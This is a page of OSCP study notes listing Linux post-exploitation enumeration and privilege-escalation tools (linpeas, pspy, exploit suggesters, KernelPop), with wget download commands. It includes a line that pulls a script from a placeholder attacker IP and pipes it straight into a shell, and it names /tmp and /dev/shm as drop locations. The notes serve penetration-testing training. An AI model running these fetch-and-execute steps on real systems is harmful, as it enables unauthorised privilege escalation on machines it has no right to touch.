OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • Words of wisdom
  • Execution of script
  • Common Location with writable permissions to download and execute scripts
  • bangenum.sh (initial linux enumeration)
  • PSPY
  • linux-smart-enumeration
  • SUID search
  • xploit_installer.py (exploit suggester)
  • Unix Priv checker
  • linux-local-enum.sh
  • linuxprivchecker.py
  • linux-exploit-suggestor.sh
  • unix-privesc-check.sh
  • KernelPop
  1. Linux Post Exploitation

Linux post exploitation scripts

I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for latest bugs and patches

Words of wisdom

Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)

Execution of script

wget http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This will pull file from attacker box and execute it and also store output to txt file

Common Location with writable permissions to download and execute scripts

/tmp
/dev/shm

bangenum.sh (initial linux enumeration)

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh

PSPY

What is running, any cron jobs any scripts? Use PSPY to find out

https://github.com/DominicBreuker/pspy

linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration

SUID search

https://github.com/Anon-Exploiter/SUID3NUM

xploit_installer.py (exploit suggester)

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>

Unix Priv checker

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

linux-local-enum.sh

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh

linuxprivchecker.py

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

linux-exploit-suggestor.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

unix-privesc-check.sh

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

KernelPop

Automated kernel vulnerability enumeration and exploitation

https://github.com/spencerdodd/kernelpop
PreviousLinux Manual ExploitationNextKernel Exploitation

Last updated 3 years ago